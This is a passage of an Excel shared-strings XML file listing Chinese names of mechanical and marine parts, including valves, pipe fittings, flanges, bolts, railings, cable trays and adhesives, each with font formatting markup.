        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带手柄的三通旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>青铜球型阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰壳式蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>青铜直角球形阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁直角球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等角型钢</t>
    </r>
  </si>
  <si>
    <r>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通管（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄厚壁三通</t>
    </r>
  </si>
  <si>
    <r>
      <t>x</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <t>x</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/180</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/180</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度短管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>深蝶形封头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短半径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>x</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊颈法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥弹性销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱弹性销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带头和螺纹孔的圆柱弹性销</t>
    </r>
  </si>
  <si>
    <r>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的管连接接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等弯头接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调直外螺纹螺栓接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直外螺纹螺栓接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调直角螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹螺栓接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹螺栓三通接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管用螺栓连接接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜管用座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调三通接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜填料环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆法兰用填料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料材料说明</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度内螺纹外螺纹管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度内螺纹管子弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹锥形座接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹和外螺纹锥形座接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆边管堵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长螺丝管件总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油杯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氧炔切割用适宜钢板厚度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轧边的圆形，方形，扁状钢条</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘合剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计插芯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中空管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角螺杆通口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公制螺纹沉头开槽螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽半沉头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽沉（平）头木螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>惠氏螺纹圆头螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹开槽埋头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头圆柱端紧定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击手轮用垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型梁用锥形垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型梁用锥形垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊六角头紧配螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环首螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>佩恩锁定装置用的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>WG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>佩恩锁定环螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击手轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接用手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阶梯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯用角板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垂直钢梯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环总成和外壳尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带脚的栏杆支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺栓的栏杆扶手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆扶手总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱脚角</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底漆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座支柱总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆两端支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆栓塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱顶板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆用圆钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环，尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环，油孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉力弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多芯双绞电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔的电缆槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械电缆槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄板电缆槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导线管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装导轨，顶帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个固定把手的管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个固定把手的管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <t>20mm</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的夹具总成</t>
    </r>
  </si>
  <si>
    <r>
      <t>30mm</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的夹具总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间隔管材</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属，螺母锁胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属，螺纹锁用胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属，螺栓锁用胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属，催化剂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/ </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底漆用胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属，管道密封用胶水</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧锁紧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形锯齿锁紧垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮锁螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮锁紧垫圈，不锈钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鞍垫</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型锥形垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥销</t>
    </r>
  </si>
  <si>
